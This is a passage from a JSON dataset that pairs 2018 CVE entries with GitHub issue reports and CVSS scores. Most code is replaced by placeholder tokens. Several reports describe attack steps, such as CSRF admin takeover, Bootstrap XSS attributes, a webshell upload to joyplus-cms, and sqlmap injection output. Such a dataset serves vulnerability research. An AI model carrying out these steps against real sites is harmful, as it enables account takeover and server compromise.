  22108. "description": "null pointer error/heap buffer overflow at APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Mini Dump crash report | Architecture/bits of the file (mandatory NUMBERTAG etc. | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG c NUMBERTAG a8 commit NUMBERTAG c NUMBERTAG build NUMBERTAG Expected behavior r2 should analyze a mini dump crash report binary quickly Actual behavior r2 leads to the non pointer error/heap buffer overflow Steps to reproduce the behavior Download FILETAG or FILETAG run r2 A Q $POC The Address Sanitizer output APITAG $POC1: ERRORTAG $POC2 ERRORTAG",
  22109. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22110. "severity": "MEDIUM",
  22111. "baseScore": 5.5,
  22112. "impactScore": 3.6,
  22113. "exploitabilityScore": 1.8
  22114. },
  22115. {
  22116. "CVE_ID": "CVE-2018-14029",
  22117. "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/153",
  22118. "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/153",
  22119. "Repo_new": "creatiwity/witycms",
  22120. "Issue_Created_At": "2018-07-11T17:36:21Z",
  22121. "description": "CSRF on PATHTAG page lead to full account take over . Hello, I came across and tried to find bug on this CMS. I see that user edit page is vulnerable to CSRF attack because there is no CSRF token to validate user's request. it means that if an admin user visits crafted url made by attacker (via XSS or Phishing), a POST request will be generated and be submitted to PATHTAG that will change admin user information included password and email address. once exploited, attacker can fully take over admin's account. Affect url: URLTAG Steps to reproduce NUMBERTAG Check POST request when user edit information on PATHTAG FILETAG NUMBERTAG Build CSRF POC based on POST request from user/edit and store it in attacker\u2019s site APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG //< FILETAG POST request generated: FILETAG NUMBERTAG After that, user\u2019s information will be changed to value attacker put on CSRF POC Mitigation: Original password is needed in order to change new password of user URLTAG",
  22122. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22123. "severity": "HIGH",
  22124. "baseScore": 8.8,
  22125. "impactScore": 5.9,
  22126. "exploitabilityScore": 2.8
  22127. },
  22128. {
  22129. "CVE_ID": "CVE-2018-14040",
  22130. "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/26625",
  22131. "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/26625",
  22132. "Repo_new": "twbs/bootstrap",
  22133. "Issue_Created_At": "2018-05-29T15:47:48Z",
  22134. "description": "XSS possible in collapse data parent attribute. XSS possible in collapse data parent attribute ERRORTAG Bootstrap NUMBERTAG in combination with APITAG NUMBERTAG",
  22135. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22136. "severity": "MEDIUM",
  22137. "baseScore": 6.1,
  22138. "impactScore": 2.7,
  22139. "exploitabilityScore": 2.8
  22140. },
  22141. {
  22142. "CVE_ID": "CVE-2018-14040",
  22143. "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/26423",
  22144. "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/26423",
  22145. "Repo_new": "twbs/bootstrap",
  22146. "Issue_Created_At": "2018-04-30T15:28:45Z",
  22147. "description": "NUMBERTAG ship list. Highlights CSS JS Docs Build tools",
  22148. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22149. "severity": "MEDIUM",
  22150. "baseScore": 6.1,
  22151. "impactScore": 2.7,
  22152. "exploitabilityScore": 2.8
  22153. },
  22154. {
  22155. "CVE_ID": "CVE-2018-14041",
  22156. "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/26627",
  22157. "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/26627",
  22158. "Repo_new": "twbs/bootstrap",
  22159. "Issue_Created_At": "2018-05-29T20:09:52Z",
  22160. "description": "XSS possible in data target property of scrollspy. XSS possible in scrollspy data target attribute data target=\" APITAG \" Bootstrap NUMBERTAG in combination with APITAG NUMBERTAG",
  22161. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22162. "severity": "MEDIUM",
  22163. "baseScore": 6.1,
  22164. "impactScore": 2.7,
  22165. "exploitabilityScore": 2.8
  22166. },
  22167. {
  22168. "CVE_ID": "CVE-2018-14042",
  22169. "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/26628",
  22170. "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/26628",
  22171. "Repo_new": "twbs/bootstrap",
  22172. "Issue_Created_At": "2018-05-29T22:30:20Z",
  22173. "description": "XSS possible in data container property of tooltip. XSS possible in tooltip data container attribute data container=\" APITAG \" Bootstrap NUMBERTAG in combination with APITAG NUMBERTAG",
  22174. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22175. "severity": "MEDIUM",
  22176. "baseScore": 6.1,
  22177. "impactScore": 2.7,
  22178. "exploitabilityScore": 2.8
  22179. },
  22180. {
  22181. "CVE_ID": "CVE-2018-14043",
  22182. "Issue_Url_old": "https://github.com/Monetra/mstdlib/issues/2",
  22183. "Issue_Url_new": "https://github.com/monetra/mstdlib/issues/2",
  22184. "Repo_new": "monetra/mstdlib",
  22185. "Issue_Created_At": "2018-07-12T14:08:40Z",
  22186. "description": "APITAG File: PATHTAG L NUMBERTAG i.e APITAG I believe this indicates a security flaw, If an attacker can change anything along the path between the call APITAG and the files actually used, attacker may exploit the race condition. Request team to have a look and validate.",
  22187. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22188. "severity": "CRITICAL",
  22189. "baseScore": 9.8,
  22190. "impactScore": 5.9,
  22191. "exploitabilityScore": 3.9
  22192. },
  22193. {
  22194. "CVE_ID": "CVE-2018-14046",
  22195. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/378",
  22196. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/378",
  22197. "Repo_new": "exiv2/exiv2",
  22198. "Issue_Created_At": "2018-07-09T01:52:51Z",
  22199. "description": "APITAG heap buffer overflow PATHTAG APITAG long). exi NUMBERTAG pp $POC APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef NUMBERTAG at pc NUMBERTAG f NUMBERTAG a NUMBERTAG fc0e bp NUMBERTAG fff NUMBERTAG cdcc NUMBERTAG sp NUMBERTAG fff NUMBERTAG cdcbf0 READ of size NUMBERTAG at NUMBERTAG ef NUMBERTAG thread T NUMBERTAG f NUMBERTAG a NUMBERTAG fc0d in APITAG long) PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG cbe in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG std::char_traits APITAG , std::allocator APITAG > const&) PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG NUMBERTAG ef NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG a9f NUMBERTAG b2 in operator APITAG long) ( PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG bbc7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG bbc7 in APITAG long) PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG APITAG long) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9df0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING NUMBERTAG poc heapoverflow URLTAG",
  22200. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22201. "severity": "HIGH",
  22202. "baseScore": 8.8,
  22203. "impactScore": 5.9,
  22204. "exploitabilityScore": 2.8
  22205. },
  22206. {
  22207. "CVE_ID": "CVE-2018-14047",
  22208. "Issue_Url_old": "https://github.com/pngwriter/pngwriter/issues/129",
  22209. "Issue_Url_new": "https://github.com/pngwriter/pngwriter/issues/129",
  22210. "Repo_new": "pngwriter/pngwriter",
  22211. "Issue_Created_At": "2018-07-11T11:49:30Z",
  22212. "description": "SEGV in function pngwriter::readfromfile. I use Clang NUMBERTAG and APITAG to build pngwriter NUMBERTAG this file URLTAG can cause SEGV signal when running the test blackwhite in folder APITAG with the following command: APITAG This is the ASAN information: ERRORTAG",
  22213. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22214. "severity": "MEDIUM",
  22215. "baseScore": 5.5,
  22216. "impactScore": 3.6,
  22217. "exploitabilityScore": 1.8
  22218. },
  22219. {
  22220. "CVE_ID": "CVE-2018-14048",
  22221. "Issue_Url_old": "https://github.com/glennrp/libpng/issues/238",
  22222. "Issue_Url_new": "https://github.com/glennrp/libpng/issues/238",
  22223. "Repo_new": "glennrp/libpng",
  22224. "Issue_Created_At": "2018-07-12T04:16:47Z",
  22225. "description": "SEGV in function png_free_data. Hi,all! We find a bug in libpng NUMBERTAG when using pngwriter URLTAG ,which take libpng as dependence. You can get more information by inferring this URLTAG !",
  22226. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22227. "severity": "MEDIUM",
  22228. "baseScore": 6.5,
  22229. "impactScore": 3.6,
  22230. "exploitabilityScore": 2.8
  22231. },
  22232. {
  22233. "CVE_ID": "CVE-2018-14049",
  22234. "Issue_Url_old": "https://github.com/marc-q/libwav/issues/22",
  22235. "Issue_Url_new": "https://github.com/marc-q/libwav/issues/22",
  22236. "Repo_new": "marc-q/libwav",
  22237. "Issue_Created_At": "2018-07-12T11:39:53Z",
  22238. "description": "SEGV in function print_info in wav_info.c. I use Clang NUMBERTAG and APITAG to build libwav , this file URLTAG can cause SEGV signal in function APITAG when running the APITAG in folder APITAG with the following command: APITAG This is the ASAN information: ERRORTAG",
  22239. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22240. "severity": "MEDIUM",
  22241. "baseScore": 6.5,
  22242. "impactScore": 3.6,
  22243. "exploitabilityScore": 2.8
  22244. },
  22245. {
  22246. "CVE_ID": "CVE-2018-14050",
  22247. "Issue_Url_old": "https://github.com/marc-q/libwav/issues/20",
  22248. "Issue_Url_new": "https://github.com/marc-q/libwav/issues/20",
  22249. "Repo_new": "marc-q/libwav",
  22250. "Issue_Created_At": "2018-07-12T11:31:06Z",
  22251. "description": "SEGV in function wrap_free in libwav.c. I use Clang NUMBERTAG and APITAG to build libwav , this file URLTAG can cause SEGV signal in function APITAG when running the APITAG in folder APITAG with the following command: APITAG This is the ASAN information: ERRORTAG",
  22252. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22253. "severity": "MEDIUM",
  22254. "baseScore": 6.5,
  22255. "impactScore": 3.6,
  22256. "exploitabilityScore": 2.8
  22257. },
  22258. {
  22259. "CVE_ID": "CVE-2018-14051",
  22260. "Issue_Url_old": "https://github.com/marc-q/libwav/issues/21",
  22261. "Issue_Url_new": "https://github.com/marc-q/libwav/issues/21",
  22262. "Repo_new": "marc-q/libwav",
  22263. "Issue_Created_At": "2018-07-12T11:33:52Z",
  22264. "description": "Infinite loop in wav_read in libwav.c. I use Clang NUMBERTAG and APITAG to build libwav , this file URLTAG can cause infinite loop in function APITAG when running the APITAG in folder APITAG with the following command: APITAG Here is the gdb information: CODETAG The infinite loop is caused by this: ERRORTAG",
  22265. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  22266. "severity": "HIGH",
  22267. "baseScore": 7.5,
  22268. "impactScore": 3.6,
  22269. "exploitabilityScore": 3.9
  22270. },
  22271. {
  22272. "CVE_ID": "CVE-2018-14063",
  22273. "Issue_Url_old": "https://github.com/tracto2/Tracto-ERC20/issues/1",
  22274. "Issue_Url_new": "https://github.com/tracto2/tracto-erc20/issues/1",
  22275. "Repo_new": "tracto2/tracto-erc20",
  22276. "Issue_Created_At": "2018-07-13T12:59:27Z",
  22277. "description": "Integer overflow in APITAG I found an integer overflow in APITAG APITAG it doesn't use the safe function to add value. code addresss: URLTAG vuln code: ERRORTAG Before overflow FILETAG After add value APITAG FILETAG Discovered by zhihua. EMAILTAG .cn",
  22278. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22279. "severity": "CRITICAL",
  22280. "baseScore": 9.8,
  22281. "impactScore": 5.9,
  22282. "exploitabilityScore": 3.9
  22283. },
  22284. {
  22285. "CVE_ID": "CVE-2018-14065",
  22286. "Issue_Url_old": "https://github.com/PHPOffice/PHPWord/issues/1421",
  22287. "Issue_Url_new": "https://github.com/phpoffice/phpword/issues/1421",
  22288. "Repo_new": "phpoffice/phpword",
  22289. "Issue_Created_At": "2018-07-11T03:50:58Z",
  22290. "description": "A vulnerability in APITAG Hi! I found a vulnerability in APITAG how can I report it to you?",
  22291. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22292. "severity": "CRITICAL",
  22293. "baseScore": 9.8,
  22294. "impactScore": 5.9,
  22295. "exploitabilityScore": 3.9
  22296. },
  22297. {
  22298. "CVE_ID": "CVE-2018-14068",
  22299. "Issue_Url_old": "https://github.com/martinzhou2015/SRCMS/issues/20",
  22300. "Issue_Url_new": "https://github.com/martinzhou2015/srcms/issues/20",
  22301. "Repo_new": "martinzhou2015/srcms",
  22302. "Issue_Created_At": "2018-07-13T01:53:21Z",
  22303. "description": "There is two CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following two page poc\uff1a FILETAG CODETAG FILETAG CODETAG",
  22304. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22305. "severity": "HIGH",
  22306. "baseScore": 8.8,
  22307. "impactScore": 5.9,
  22308. "exploitabilityScore": 2.8
  22309. },
  22310. {
  22311. "CVE_ID": "CVE-2018-14071",
  22312. "Issue_Url_old": "https://github.com/cyberhobo/wordpress-geo-mashup/issues/817",
  22313. "Issue_Url_new": "https://github.com/cyberhobo/wordpress-geo-mashup/issues/817",
  22314. "Repo_new": "cyberhobo/wordpress-geo-mashup",
  22315. "Issue_Created_At": "2018-07-12T03:19:31Z",
  22316. "description": "Strengthen sanitization. Make sure all post editor and other user input is sanitized before use.",
  22317. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22318. "severity": "CRITICAL",
  22319. "baseScore": 9.8,
  22320. "impactScore": 5.9,
  22321. "exploitabilityScore": 3.9
  22322. },
  22323. {
  22324. "CVE_ID": "CVE-2018-14072",
  22325. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/67",
  22326. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/67",
  22327. "Repo_new": "saitoha/libsixel",
  22328. "Issue_Created_At": "2018-07-14T01:39:16Z",
  22329. "description": "Memory leak detected. Memory leaks detected when running program sixel2png the input file is APITAG with address sanitizer. ERRORTAG",
  22330. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  22331. "severity": "HIGH",
  22332. "baseScore": 7.5,
  22333. "impactScore": 3.6,
  22334. "exploitabilityScore": 3.9
  22335. },
  22336. {
  22337. "CVE_ID": "CVE-2018-14329",
  22338. "Issue_Url_old": "https://github.com/samtools/htslib/issues/736",
  22339. "Issue_Url_new": "https://github.com/samtools/htslib/issues/736",
  22340. "Repo_new": "samtools/htslib",
  22341. "Issue_Created_At": "2018-07-15T07:06:13Z",
  22342. "description": "APITAG Team, File: PATHTAG CODETAG I believe this indicates a security flaw, If an attacker can change anything along the path between the call APITAG and the files actually used, attacker may exploit the race condition. Request team to have a look and validate.",
  22343. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N",
  22344. "severity": "MEDIUM",
  22345. "baseScore": 4.7,
  22346. "impactScore": 3.6,
  22347. "exploitabilityScore": 1.0
  22348. },
  22349. {
  22350. "CVE_ID": "CVE-2018-14332",
  22351. "Issue_Url_old": "https://github.com/clementine-player/Clementine/issues/6078",
  22352. "Issue_Url_new": "https://github.com/clementine-player/clementine/issues/6078",
  22353. "Repo_new": "clementine-player/clementine",
  22354. "Issue_Created_At": "2018-06-06T22:18:50Z",
  22355. "description": "Clementine often crashes when playing ogg files APITAG fault core dumped, qt5). System information Operating System: Arch Linux Clementine version: clementine qt5 git Expected behavior / actual behavior Clementine often crashes while playing ogg files. Sometimes as many times as once per song. (I would play an album, such as URLTAG , Clementine crashes, I start it back up and play so that the same song restarts, then it seems to crash on the next one.) I think this has been happening for a long time, I've part of using Clementine, but it seems more consistent now so maybe identifiable (I don't know if that's because I've been listening to a lot of ogg albums from FILETAG or a regression) Looking at the terminal output I thought it may have been the writing statistics to file bit or lastfm, but it still crashes without these. Here is some log URLTAG (from $ APITAG ), I don't know if it's relevant or the segfault occurs independently later. I will keep trying with different settings and types types of files and keep posting if I find anything.",
  22356. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22357. "severity": "MEDIUM",
  22358. "baseScore": 5.5,
  22359. "impactScore": 3.6,
  22360. "exploitabilityScore": 1.8
  22361. },
  22362. {
  22363. "CVE_ID": "CVE-2018-14334",
  22364. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/428",
  22365. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/428",
  22366. "Repo_new": "joyplus/joyplus-cms",
  22367. "Issue_Created_At": "2018-07-16T04:06:53Z",
  22368. "description": "Joyplus cms NUMBERTAG has any file upload vulnerability , leading to getshell. First, add a shortcut menu. FILETAG second, Switch to the home menu. FILETAG Third, you will find a file upload and upload a webshell. FILETAG last, use Cknife to connect the shell. FILETAG succes~ From the PATHTAG FILETAG As the picture show that, the developer have set white list restrictions, but he doesn't exit the file upload process. Fix: You should exit the script when detect the illegal files",
  22369. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22370. "severity": "CRITICAL",
  22371. "baseScore": 9.8,
  22372. "impactScore": 5.9,
  22373. "exploitabilityScore": 3.9
  22374. },
  22375. {
  22376. "CVE_ID": "CVE-2018-14337",
  22377. "Issue_Url_old": "https://github.com/mruby/mruby/issues/4062",
  22378. "Issue_Url_new": "https://github.com/mruby/mruby/issues/4062",
  22379. "Repo_new": "mruby/mruby",
  22380. "Issue_Created_At": "2018-06-25T15:27:56Z",
  22381. "description": "Signed integer overflow in mrb_str_format. The check macro (in APITAG ) contains an signed integer overflow in bsize : ERRORTAG APITAG can become negative. However with APITAG the APITAG is never triggered, since bsiz is a signed integer. Signed integer overflows are undefined behaviour and thus gcc removes the check. This results in negative integers being passed to APITAG , which will set the string length without further checks. This can potentially result in a oversized string that allows to access arbitrary memory. In our experiments building with gcc in version APITAG produces the vulnerable binary while clang generated a safe executable. CODETAG Reproduce: CODETAG Backtrace in gdb : CODETAG Credits: This issue was reported by Sergej Schumilo, Daniel Teuchert and Cornelius Aschermann. Impact This results in negative integers being passed to APITAG , which will set the string length without further checks. This can potentially result in a oversized string that allows to access arbitrary memory.",
  22382. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  22383. "severity": "HIGH",
  22384. "baseScore": 7.5,
  22385. "impactScore": 3.6,
  22386. "exploitabilityScore": 3.9
  22387. },
  22388. {
  22389. "CVE_ID": "CVE-2018-14338",
  22390. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/382",
  22391. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/382",
  22392. "Repo_new": "exiv2/exiv2",
  22393. "Issue_Created_At": "2018-07-14T15:29:09Z",
  22394. "description": "APITAG at APITAG File: geotag.cpp CODETAG and ERRORTAG According to the documentation of APITAG the output buffer needs to be at least of size APITAG specifying output buffers large enough to handle the maximum size possible result from path manipulation functions. In that instance, buf's size comes from APITAG . That function attempts to use APITAG as noted in the realpath NUMBERTAG docs. But over here APITAG nor APITAG is used. Passing an inadequately sized output buffer to a path manipulation function can result in a buffer overflow. Such functions include APITAG APITAG APITAG and others.",
  22395. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22396. "severity": "HIGH",
  22397. "baseScore": 8.1,
  22398. "impactScore": 5.9,
  22399. "exploitabilityScore": 2.2
  22400. },
  22401. {
  22402. "CVE_ID": "CVE-2018-14371",
  22403. "Issue_Url_old": "https://github.com/javaserverfaces/mojarra/issues/4364",
  22404. "Issue_Url_new": "https://github.com/javaserverfaces/mojarra/issues/4364",
  22405. "Repo_new": "javaserverfaces/mojarra",
  22406. "Issue_Created_At": "2018-04-17T15:15:17Z",
  22407. "description": "Where Can I Report Security Vulnerability?. I found a vulnerability in the latest version of Mojarra (vulnerable by default). But I can't find any security related mail from websites. Where can I report my finding?",
  22408. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  22409. "severity": "HIGH",
  22410. "baseScore": 7.5,
  22411. "impactScore": 3.6,
  22412. "exploitabilityScore": 3.9
  22413. },
  22414. {
  22415. "CVE_ID": "CVE-2018-14381",
  22416. "Issue_Url_old": "https://github.com/pagekit/pagekit/issues/905",
  22417. "Issue_Url_new": "https://github.com/pagekit/pagekit/issues/905",
  22418. "Repo_new": "pagekit/pagekit",
  22419. "Issue_Created_At": "2018-07-05T08:52:07Z",
  22420. "description": "Open redirect vulnerability in /user/login?redirect=. Technical Details Pagekit version NUMBERTAG Web server: Apache Database: Mysql PHP Version NUMBERTAG Hello, I found a open redirect vulnerability. Detail: After a user login ,access this url URLTAG will redirect to google. Author: zhihua.yao from APITAG",
  22421. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22422. "severity": "MEDIUM",
  22423. "baseScore": 6.1,
  22424. "impactScore": 2.7,
  22425. "exploitabilityScore": 2.8
  22426. },
  22427. {
  22428. "CVE_ID": "CVE-2018-14387",
  22429. "Issue_Url_old": "https://github.com/robiso/wondercms/issues/64",
  22430. "Issue_Url_new": "https://github.com/wondercms/wondercms/issues/64",
  22431. "Repo_new": "wondercms/wondercms",
  22432. "Issue_Created_At": "2018-07-18T12:32:14Z",
  22433. "description": "Session Fixation. Wonder CMS NUMBERTAG is prone to session fixation attack. APITAG Session Fixation attack fixes a session on the victim's browser, so the attack starts before the user logs in NUMBERTAG An attacker creates a new session on a web application and records the associated session identifier. The attacker then causes the victim to authenticate against the server using the same session identifier. APITAG attacker can access to the user's account through the active session APITAG authenticating a user, it doesn\u2019t assign a new session ID, making it possible to use an existent session ID. Let's see the session values before login FILETAG Session Values after Login: FILETAG Mitigation: The application should always first invalidate the existing session ID before authenticating a user, and if the authentication is successful, provide another APITAG",
  22434. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22435. "severity": "HIGH",
  22436. "baseScore": 8.8,
  22437. "impactScore": 5.9,
  22438. "exploitabilityScore": 2.8
  22439. },
  22440. {
  22441. "CVE_ID": "CVE-2018-14388",
  22442. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/429",
  22443. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/429",
  22444. "Repo_new": "joyplus/joyplus-cms",
  22445. "Issue_Created_At": "2018-07-16T10:19:16Z",
  22446. "description": "joyplus cms NUMBERTAG FILETAG has new Cross Site Scripting: requests:. requests: POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG adminid NUMBERTAG adminname=admin; APITAG APITAG DNT NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG APITAG APITAG APITAG &t_sort NUMBERTAG t_des=test FILETAG FILETAG",
  22447. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  22448. "severity": "MEDIUM",
  22449. "baseScore": 5.4,
  22450. "impactScore": 2.7,
  22451. "exploitabilityScore": 2.3
  22452. },
  22453. {
  22454. "CVE_ID": "CVE-2018-14389",
  22455. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/430",
  22456. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/430",
  22457. "Repo_new": "joyplus/joyplus-cms",
  22458. "Issue_Created_At": "2018-07-16T11:01:41Z",
  22459. "description": "joyplus cms NUMBERTAG FILETAG has SQL Injection. requests:GET PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: application/json, text/javascript, / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded X Requested With: APITAG Cookie: APITAG adminid NUMBERTAG adminname=admin; APITAG APITAG DNT NUMBERTAG Connection: close sqlmap: FILETAG sqlmap identified the following injection point(s) with a total of NUMBERTAG HTTP(s) requests: Parameter: val (GET) Type: boolean based blind Title: APITAG NUMBERTAG boolean based blind Parameter replace Payload: APITAG (CASE WHEN NUMBERTAG THEN NUMBERTAG ELSE NUMBERTAG SELECT NUMBERTAG FROM APITAG END)) Type: UNION query Title: Generic UNION query (NULL NUMBERTAG columns Payload: APITAG UNION ALL SELECT APITAG APITAG web server operating system: Windows web application technology: Apache NUMBERTAG PHP NUMBERTAG back end DBMS: APITAG NUMBERTAG",
  22460. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22461. "severity": "CRITICAL",
  22462. "baseScore": 9.8,
  22463. "impactScore": 5.9,
  22464. "exploitabilityScore": 3.9
  22465. },
  22466. {
  22467. "CVE_ID": "CVE-2018-14401",
  22468. "Issue_Url_old": "https://github.com/jjanier/axml/issues/1",
  22469. "Issue_Url_new": "https://github.com/jjanier/axml/issues/1",
  22470. "Repo_new": "jjanier/axml",
  22471. "Issue_Created_At": "2018-07-17T12:11:29Z",
  22472. "description": "out of bound read lead the program crash.. When load the poc file with gdb . I got that It call APITAG function to copy file data to memory buf. But the APITAG is out of memory , it could lead crash ERRORTAG The poc and the binary APITAG",
  22473. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  22474. "severity": "HIGH",
  22475. "baseScore": 7.5,
  22476. "impactScore": 3.6,
  22477. "exploitabilityScore": 3.9
  22478. },
  22479. {
  22480. "CVE_ID": "CVE-2018-14402",
  22481. "Issue_Url_old": "https://github.com/ytsutano/axmldec/issues/4",
  22482. "Issue_Url_new": "https://github.com/ytsutano/axmldec/issues/4",
  22483. "Repo_new": "ytsutano/axmldec",
  22484. "Issue_Created_At": "2018-07-17T12:38:51Z",
  22485. "description": "access invail memory lead to crash. When load the poc file with gdb . I got that It call APITAG function . and it access memroy using rax 's value APITAG but APITAG , this could lead crash ERRORTAG The binary and poc APITAG",
  22486. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  22487. "severity": "HIGH",
  22488. "baseScore": 7.5,
  22489. "impactScore": 3.6,
